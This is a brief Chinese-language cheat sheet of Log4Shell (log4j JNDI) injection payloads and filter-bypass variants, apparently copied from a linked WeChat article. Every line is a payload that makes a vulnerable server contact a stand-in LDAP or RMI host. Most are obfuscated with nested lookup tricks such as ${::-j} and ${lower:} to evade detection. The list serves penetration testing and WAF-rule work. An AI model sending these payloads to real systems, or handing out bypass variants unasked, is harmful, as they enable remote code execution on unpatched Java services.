常用log4j payload 以及绕过
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| ${jndi:ldap://xxx.dnslog.cn} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc} ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass} ${jndi:rmi://adsasd.asdasd.asdasd} ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc} ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc} ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc} ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxx xxxx.xx/poc} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/ass} ${${::-j}ndi:rmi://127.0.0.1:1389/ass} ${jndi:rmi://a.b.c} ${${lower:jndi}:${lower:rmi}://q.w.e/poc} ${${lower:${lower:jndi}}:${lower:rmi}://a.s.d/poc} abcd-${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}-aksdkashkd--
|
来源:
https://mp.weixin.qq.com/s/VmUh49pHcEumJIKsulW3gw